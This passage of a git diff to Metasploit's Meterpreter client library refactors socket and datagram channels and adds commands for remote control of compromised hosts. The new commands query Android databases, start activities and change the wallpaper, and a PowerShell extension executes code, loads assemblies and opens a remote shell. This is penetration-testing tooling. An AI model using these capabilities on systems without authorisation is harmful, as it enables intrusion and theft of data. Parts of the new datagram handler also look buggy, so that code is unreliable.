b/lib/rex/post/meterpreter/channel.rb index d693e3bf74..50da0dc185 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -141,7 +141,9 @@ class Channel if (cid and client) client.add_channel(self) end - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.cid) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, cid)) end def self.finalize(client,cid) @@ -288,8 +290,11 @@ class Channel end def _close(addends = nil) - self.class._close(self.client, self.cid, addends) - self.cid = nil + unless self.cid.nil? + ObjectSpace.undefine_finalizer(self) + self.class._close(self.client, self.cid, addends) + self.cid = nil + end end # # Enables or disables interactive mode. diff --git a/lib/rex/post/meterpreter/channels/datagram.rb b/lib/rex/post/meterpreter/channels/datagram.rb new file mode 100644 index 0000000000..fc8c2e3323 --- /dev/null +++ b/lib/rex/post/meterpreter/channels/datagram.rb @@ -0,0 +1,75 @@ +# -*- coding: binary -*- + +require 'rex/io/datagram_abstraction' +require 'rex/post/meterpreter/channels/socket_abstraction' + +module Rex +module Post +module Meterpreter + +### +# +# Stream +# ------ +# +# This class represents a channel that is streaming. This means +# that sequential data is flowing in either one or both directions. +# +### +class Datagram < Rex::Post::Meterpreter::Channel + + include Rex::Post::Meterpreter::SocketAbstraction + include Rex::IO::DatagramAbstraction + + class << self + def cls + return CHANNEL_CLASS_DATAGRAM + end + end + + module SocketInterface + include Rex::Post::Meterpreter::SocketAbstraction::SocketInterface + def type? + 'udp' + end + + def recvfrom_nonblock(length,flags = nil) + return [super(length, flags)[0], super(length, flags)[0]] + end + + def send(buf, flags, saddr) + channel.send(buf, flags, saddr) + end + end + + def dio_write_handler(packet, data) + @recvd ||= [] + @recvd << [packet, data] + peerhost = packet.get_tlv_value( + Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_HOST + ) + peerport = packet.get_tlv_value( + Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_PORT + ) + + if peerhost && peerport + # Maxlen here is 65507, to ensure we dont overflow, we need to write twice + # If the other side has a full 64k, handle by splitting up the datagram and + # writing multiple times along with the sockaddr. Consumers calling recvfrom + # repeatedly will buffer up all the pieces. + while data.length > 65507 + rsock.syswrite(data[0..65506]) + rsock.syswrite(Rex::Socket.to_sockaddr(peerhost,peerport)) + data = data - data[0..65506] + end + rsock.syswrite(data) + rsock.syswrite(Rex::Socket.to_sockaddr(peerhost,peerport)) + return true + else + return false + end + end + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb new file mode 100644 index 0000000000..c59577dfae --- /dev/null +++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb @@ -0,0 +1,160 @@ +# -*- coding: binary -*- + +# require 'rex/io/socket_abstraction' +require 'rex/post/meterpreter/channel' + +module Rex +module Post +module Meterpreter + +### +# +# Abstraction +# ------ +# +# This class represents a channel that is streaming. This means +# that sequential data is flowing in either one or both directions. +# +### +module SocketAbstraction + + class << self + def cls + raise NotImplementedError + end + end + + module SocketInterface + def type? + raise NotImplementedError + end + + def getsockname + return super if not channel + # Find the first host in our chain (our address) + hops = 0 + csock = channel.client.sock + while(csock.respond_to?('channel')) + csock = csock.channel.client.sock + hops += 1 + end + _address_family,caddr,_cport = csock.getsockname + address_family,raddr,_rport = csock.getpeername + _maddr,mport = [ channel.params.localhost, channel.params.localport ] + [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] + end + + def getpeername + return super if not channel + address_family,_caddr,_cport = channel.client.sock.getpeername + maddr,mport = [ channel.params.peerhost, channel.params.peerport ] + [ address_family, "#{maddr}", "#{mport}" ] + end + + %i{localhost localport peerhost peerport}.map do |meth| + define_method(meth) { + return super if not channel + channel.params.send(meth) + } + end + + def close + super + channel.cleanup_abstraction + channel.close + end + + attr_accessor :channel + end + + # + # Simple mixin for lsock in order to help avoid a ruby interpreter issue with ::Socket.pair + # Instead of writing to the lsock, reading from the rsock and then writing to the channel, + # we use this mixin to directly write to the channel. + # + # Note: This does not work with OpenSSL as OpenSSL is implemented natively and requires a real + # socket to write to and we cant intercept the sockets syswrite at a native level. + # + # Note: The deadlock only seems to effect the Ruby build for cygwin. + # + module DirectChannelWrite + + def syswrite(buf) + channel._write(buf) + end + + attr_accessor :channel + end + + ## + # + # Constructor + # + ## + + # + # Passes the initialization information up to the base class + # + def initialize(client, cid, type, flags) + # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called + # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel + # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write' + # request comes in before we have called self.initialize_abstraction() + initialize_abstraction + super(client, cid, type, flags) + end + + ## + # + # Remote I/O handlers + # + ## + + # + # Performs a write operation on the right side of the local stream. + # + def dio_write_handler(packet, data) + rv = Rex::ThreadSafe.select(nil, [rsock], nil, 0.01) + if(rv) + rsock.syswrite(data) + return true + else + return false + end + end + + # + # Performs a close operation on the right side of the local stream. + # + def dio_close_handler(packet) + rsock.close + + return super(packet) + end + + # + # Cleans up the stream abstraction. + # + def cleanup + super + + cleanup_abstraction + end + + # + # Wrap the _write() call in order to catch some common, but harmless Windows exceptions + # + def _write(*args) + begin + super(*args) + rescue ::Rex::Post::Meterpreter::RequestError => e + case e.code + when 10000 .. 10100 + raise ::Rex::ConnectionError.new + end + end + end + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/channels/stream.rb b/lib/rex/post/meterpreter/channels/stream.rb index 95c1e48e6e..09e1f86b3c 100644 --- a/lib/rex/post/meterpreter/channels/stream.rb +++ b/lib/rex/post/meterpreter/channels/stream.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'rex/io/stream_abstraction' -require 'rex/post/meterpreter/channel' +require 'rex/post/meterpreter/channels/socket_abstraction' module Rex module Post @@ -18,6 +18,7 @@ module Meterpreter ### class Stream < Rex::Post::Meterpreter::Channel + include Rex::Post::Meterpreter::SocketAbstraction include Rex::IO::StreamAbstraction class << self @@ -26,61 +27,13 @@ class Stream < Rex::Post::Meterpreter::Channel end end - ## - # - # Constructor - # - ## - - # - # Passes the initialization information up to the base class - # - def initialize(client, cid, type, flags) - # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called - # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel - # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write' - # request comes in before we have called self.initialize_abstraction() - initialize_abstraction - super(client, cid, type, flags) - end - - ## - # - # Remote I/O handlers - # - ## - - # - # Performs a write operation on the right side of the local stream. - # - def dio_write_handler(packet, data) - rv = Rex::ThreadSafe.select(nil, [rsock], nil, 0.01) - if(rv) - rsock.write(data) - return true - else - return false + module SocketInterface + include Rex::Post::Meterpreter::SocketAbstraction::SocketInterface + def type? + 'tcp' end end - # - # Performs a close operation on the right side of the local stream. - # - def dio_close_handler(packet) - rsock.close - - return super(packet) - end - - # - # Cleans up the stream abstraction. - # - def cleanup - super - - cleanup_abstraction - end - end end; end; end diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index b751768348..c550eaef79 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -469,7 +469,7 @@ class ClientCore < Extension end if client.platform =~ /linux/ - if writable_dir.blank? + if writable_dir.to_s.strip.empty? writable_dir = tmp_folder end @@ -752,7 +752,7 @@ class ClientCore < Extension def tmp_folder tmp = client.sys.config.getenv('TMPDIR') - if tmp.blank? + if tmp.to_s.strip.empty? tmp = '/tmp' end diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 931b591708..fa4d1e8372 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -72,6 +72,12 @@ class Android < Extension response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value end + def set_audio_mode(n) + request = Packet.create_request('set_audio_mode') + request.add_tlv(TLV_TYPE_AUDIO_MODE, n) + response = client.send_request(request) + end + def interval_collect(opts) request = Packet.create_request('interval_collect') request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]]) @@ -242,6 +248,23 @@ class Android < Extension response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + def activity_start(uri) + request = Packet.create_request('activity_start') + request.add_tlv(TLV_TYPE_URI_STRING, uri) + response = client.send_request(request) + if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + return nil + else + return response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value + end + end + + def set_wallpaper(data) + request = Packet.create_request('set_wallpaper') + request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data) + response = client.send_request(request) + end + def send_sms(dest, body, dr) request = Packet.create_request('send_sms') request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) @@ -272,6 +295,33 @@ class Android < Extension end networks end + + def sqlite_query(dbname, query, writeable) + request = Packet.create_request('sqlite_query') + request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) + request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) + request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable) + response = client.send_request(request, 30) + error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR) + raise "SQLiteException: #{error_msg.value}" if error_msg + + unless writeable + result = { + columns: [], + rows: [] + } + data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) + unless data.nil? + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end + end + result + end + end + end end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 99f269327d..15d047810b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -75,9 +75,22 @@ TLV_TYPE_CELL_BASE_LAT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9072) TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) +TLV_TYPE_AUDIO_MODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9075) +TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) +TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) +TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) +TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080) +TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081) +TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082) +TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083) +TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084) +TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085) +TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086) +TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087) +TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201) end end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index fde12f624e..a69cfdfb07 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -31,7 +31,7 @@ class Wmi def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') - request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank? + request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.strip.empty? request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb new file mode 100644 index 0000000000..d4949d465c --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -0,0 +1,83 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/extensions/powershell/tlv' + +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +### +# +# This meterpreter extensions a privilege escalation interface that is capable +# of doing things like dumping password hashes and performing local +# exploitation. +# +### +class Powershell < Extension + + + def initialize(client) + super(client, 'powershell') + + client.register_extension_aliases( + [ + { + 'name' => 'powershell', + 'ext' => self + }, + ]) + end + + + def import_file(opts={}) + return nil unless opts[:file] + + # if it's a script, then we'll just use execute_string + if opts[:file].end_with?('.ps1') + opts[:code] = ::File.read(opts[:file]) + return execute_string(opts) + end + + # if it's a dll (hopefully a .NET 2.0 one) then do something different + if opts[:file].end_with?('.dll') + # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly? + binary = ::File.read(opts[:file]) + + request = Packet.create_request('powershell_assembly_load') + request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length) + request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary) + client.send_request(request) + return true + end + + return false + end + + def execute_string(opts={}) + return nil unless opts[:code] + + request = Packet.create_request('powershell_execute') + request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code]) + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] + + response = client.send_request(request) + return response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT) + end + + def shell(opts={}) + request = Packet.create_request('powershell_shell') + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] + + response = client.send_request(request) + channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID) + if channel_id.nil? + raise Exception, "We did not get a channel back!" + end + Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS) + end + +end + +end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb new file mode 100644 index 0000000000..edb69d3c68 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +TLV_TYPE_POWERSHELL_SESSIONID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) +TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) +TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) +TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 4) +TLV_TYPE_POWERSHELL_ASSEMBLY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 5) + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb index 950815dbaa..753dd8c808 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb @@ -41,7 +41,7 @@ class Socket # register the inbound handler for the tcp server channel (allowing us to # receive new client connections to a tcp server channel) - client.register_inbound_handler( Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel ) + client.register_inbound_handler(Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel) end @@ -49,7 +49,7 @@ class Socket # Deregister the inbound handler for the tcp server channel # def shutdown - client.deregister_inbound_handler( Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel ) + client.deregister_inbound_handler(Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel) end ## @@ -63,17 +63,17 @@ class Socket # in the socket parameters instance. The +params+ argument is expected to be # of type Rex::Socket::Parameters. # - def create( params ) + def create(params) res = nil - if( params.tcp? ) - if( params.server? ) - res = create_tcp_server_channel( params ) + if params.tcp? + if params.server? + res = create_tcp_server_channel(params) else - res = create_tcp_client_channel( params ) + res = create_tcp_client_channel(params) end - elsif( params.udp? ) - res = create_udp_channel( params ) + elsif params.udp? + res = create_udp_channel(params) end return res @@ -87,6 +87,8 @@ class Socket return SocketSubsystem::TcpServerChannel.open(client, params) rescue ::Rex::Post::Meterpreter::RequestError => e case e.code + when 10048 + raise ::Rex::AddressInUse.new(params.localhost, params.localport) when 10000 .. 10100 raise ::Rex::ConnectionError.new end @@ -100,7 +102,7 @@ class Socket def create_tcp_client_channel(params) begin channel = SocketSubsystem::TcpClientChannel.open(client, params) - if( channel != nil ) + if channel != nil return channel.lsock end return nil @@ -118,10 +120,16 @@ class Socket # def create_udp_channel(params) begin - return SocketSubsystem::UdpChannel.open(client, params) + channel = SocketSubsystem::UdpChannel.open(client, params) + if channel != nil + return channel.lsock + end + return nil rescue ::Rex::Post::Meterpreter::RequestError => e case e.code - when 10000 .. 10100 + when 10048 + raise ::Rex::AddressInUse.new(params.localhost, params.localport) + when 10000 .. 10100 raise ::Rex::ConnectionError.new end raise e diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index d0127ef158..09832b6c2b 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -23,61 +23,6 @@ module SocketSubsystem ### class TcpClientChannel < Rex::Post::Meterpreter::Stream - class << self - def cls - return CHANNEL_CLASS_STREAM - end - end - - module SocketInterface - def type? - 'tcp' - end - - def getsockname - return super if not channel - # Find the first host in our chain (our address) - hops = 0 - csock = channel.client.sock - while(csock.respond_to?('channel')) - csock = csock.channel.client.sock - hops += 1 - end - tmp,caddr,cport = csock.getsockname - tmp,raddr,rport = csock.getpeername - maddr,mport = [ channel.params.localhost, channel.params.localport ] - [ tmp, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] - end - - def getpeername - return super if not channel - tmp,caddr,cport = channel.client.sock.getpeername - maddr,mport = [ channel.params.peerhost, channel.params.peerport ] - [ tmp, "#{maddr}", "#{mport}" ] - end - - attr_accessor :channel - end - - # - # Simple mixin for lsock in order to help avoid a ruby interpreter issue with ::Socket.pair - # Instead of writing to the lsock, reading from the rsock and then writing to the channel, - # we use this mixin to directly write to the channel. - # - # Note: This does not work with OpenSSL as OpenSSL is implemented natively and requires a real - # socket to write to and we cant intercept the sockets syswrite at a native level. - # - # Note: The deadlock only seems to effect the Ruby build for cygwin. - # - module DirectChannelWrite - - def syswrite( buf ) - channel._write( buf ) - end - - attr_accessor :channel - end - ## # # Factory @@ -124,14 +69,14 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream # # Passes the channel initialization information up to the base class. # - def initialize( client, cid, type, flags ) - super( client, cid, type, flags ) + def initialize(client, cid, type, flags) + super(client, cid, type, flags) - lsock.extend( SocketInterface ) - lsock.extend( DirectChannelWrite ) + lsock.extend(SocketInterface) + lsock.extend(DirectChannelWrite) lsock.channel = self - rsock.extend( SocketInterface ) + rsock.extend(SocketInterface) rsock.channel = self end @@ -156,24 +101,11 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how) request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) - response = client.send_request(request) + client.send_request(request) return true end - # - # Wrap the _write() call in order to catch some common, but harmless Windows exceptions - # - def _write(*args) - begin - super(*args) - rescue ::Rex::Post::Meterpreter::RequestError => e - case e.code - when 10000 .. 10100 - raise ::Rex::ConnectionError.new - end - end - end end end; end; end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb index f8e7f310e0..62c03b58aa 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb @@ -5,6 +5,7 @@ require 'rex/socket/udp' require 'rex/socket/parameters' require 'rex/post/meterpreter/extensions/stdapi/tlv' require 'rex/post/meterpreter/channel' +require 'rex/post/meterpreter/channels/datagram' module Rex module Post @@ -14,30 +15,26 @@ module Stdapi module Net module SocketSubsystem -class UdpChannel < Rex::Post::Meterpreter::Channel - - # - # We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket. - # - include Rex::Socket::Udp +class UdpChannel < Rex::Post::Meterpreter::Datagram # # We are a datagram channel. # - class << self - def cls - return CHANNEL_CLASS_DATAGRAM - end + def self.cls + CHANNEL_CLASS_DATAGRAM end # - # Open a new UDP channel on the remote end. The local host/port are optional, if none are specified - # the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also - # optional, if specified all default send(), write() call will sendto the specified peer. If no peer - # host/port is specified you must use sendto() and specify the remote peer you wish to send to. This - # effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease. + # Open a new UDP channel on the remote end. The local host/port are + # optional, if none are specified the remote end will bind to INADDR_ANY + # with a random port number. The peer host/port are also optional, if + # specified all default send(), write() call will sendto the specified peer. + # If no peer host/port is specified you must use sendto() and specify the + # remote peer you wish to send to. This effectivly lets us create + # bound/unbound and connected/unconnected UDP sockets with ease. # - def UdpChannel.open(client, params) + # @return [Channel] + def self.open(client, params) c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS, [ { @@ -66,95 +63,25 @@ class UdpChannel < Rex::Post::Meterpreter::Channel # def initialize(client, cid, type, flags) super(client, cid, type, flags) - # the instance variable that holds all incoming datagrams. - @datagrams = [] - end - # - # We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select - # which wont be of use as we are not a natively backed ::Socket or ::IO instance. - # - def timed_read( length=65535, timeout=def_read_timeout ) - result = '' + lsock.extend(Rex::Socket::Udp) + lsock.initsock + lsock.extend(SocketInterface) + lsock.extend(DirectChannelWrite) + lsock.channel = self - begin - Timeout.timeout( timeout ) { - while( true ) - if( @datagrams.empty? ) - Rex::ThreadSafe.sleep( 0.2 ) - next - end - result = self.read( length ) - break - end - } - rescue Timeout::Error - result = '' - end + # rsock.extend( Rex::Socket::Udp ) + rsock.extend(SocketInterface) + rsock.channel = self - return result - end - - # - # We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the - # datagrams which the remote end of this channel has received and are in the - # queue. - # - def recvfrom( length=65535, timeout=def_read_timeout ) - result = nil - # force a timeout on the wait for an incoming datagram - begin - Timeout.timeout( timeout ) { - while( true ) - # wait untill we have at least one datagram in the queue - if( @datagrams.empty? ) - Rex::ThreadSafe.sleep( 0.2 ) - next - end - # grab the oldest datagram we have received... - result = @datagrams.shift - # break as we have a result... - break - end - } - rescue Timeout::Error - result = nil - end - # if no result return nothing - if( result == nil ) - return [ '', nil, nil ] - end - # get the data from this datagram - data = result[0] - # if its only a partial read of this datagram, slice it, loosing the remainder. - result[0] = data[0,length-1] if data.length > length - # return the result in the form [ data, host, port ] - return result - end - - # - # Overwrite the low level sysread to read data off our datagram queue. Calls - # to read() will end up calling this. - # - def sysread( length ) - result = self.recvfrom( length ) - return result[0] - end - - # - # Overwrite the low level syswrite to write data to the remote end of the channel. - # Calls to write() will end up calling this. - # - def syswrite( buf ) - return _write( buf ) end # # This function is called by Rex::Socket::Udp.sendto and writes data to a specified # remote peer host/port via the remote end of the channel. # - def send( buf, flags, saddr ) - af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr ) + def send(buf, flags, saddr) + _af, peerhost, peerport = Rex::Socket.from_sockaddr(saddr) addends = [ { @@ -167,42 +94,9 @@ class UdpChannel < Rex::Post::Meterpreter::Channel } ] - return _write( buf, buf.length, addends ) + return _write(buf, buf.length, addends) end - # - # The channels direct io write handler for any incoming data from the remote end - # of the channel. We extract the data and peer host/port, and save this to a queue - # of incoming datagrams which are passed out via calls to self.recvfrom() - # - def dio_write_handler( packet, data ) - - peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST ) - peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT ) - - if( peerhost and peerport ) - @datagrams << [ data, peerhost, peerport ] - return true - end - - return false - end - - # - # Wrap the _write() call in order to catch some common, but harmless Windows exceptions - # - def _write(*args) - begin - super(*args) - rescue ::Rex::Post::Meterpreter::RequestError => e - case e.code - when 10000 .. 10100 - raise ::Rex::ConnectionError.new - end - end - end - - end end; end; end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb index 87bcdf34e4..cb2d556520 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb @@ -60,7 +60,9 @@ class EventLog def initialize(hand) self.client = self.class.client self.handle = hand - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.handle) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hand)) end def self.finalize(client,handle) @@ -185,7 +187,11 @@ class EventLog # Instance method def close - self.class.close(self.client, self.handle) + unless self.handle.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.handle) + self.handle = nil + end end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb index 92f77b3567..31cc02e7ff 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb @@ -285,11 +285,12 @@ class Process < Rex::Post::Process 'thread' => Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread.new(self), }) - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.handle) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, handle)) end - def self.finalize(client,handle) - proc { self.close(client,handle) } + def self.finalize(client, handle) + proc { self.close(client, handle) } end # @@ -320,8 +321,12 @@ class Process < Rex::Post::Process # # Instance method # - def close(handle=self.handle) - self.class.close(self.client, handle) + def close(handle = self.handle) + unless self.pid.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, handle) + self.pid = nil + end end # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb index bd2bbf34b0..af689a2671 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb @@ -30,7 +30,8 @@ class RegistryKey self.perm = perm self.hkey = hkey - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.hkey) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hkey)) end def self.finalize(client,hkey) @@ -115,7 +116,11 @@ class RegistryKey # Instance method for the same def close() - self.class.close(self.client, self.hkey) + unless self.hkey.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.hkey) + self.hkey = nil + end end ## diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb index 7ad533e3f4..8fb734aa98 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb @@ -29,11 +29,12 @@ class RemoteRegistryKey self.target_host = target_host self.hkey = hkey - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.hkey) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hkey)) end - def self.finalize(client,hkey) - proc { self.close(client,hkey) } + def self.finalize(client, hkey) + proc { self.close(client, hkey) } end ## @@ -113,8 +114,12 @@ class RemoteRegistryKey end # Instance method for the same - def close() - self.class.close(self.client, self.hkey) + def close + unless self.hkey.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.hkey) + self.hkey = nil + end end ## diff --git 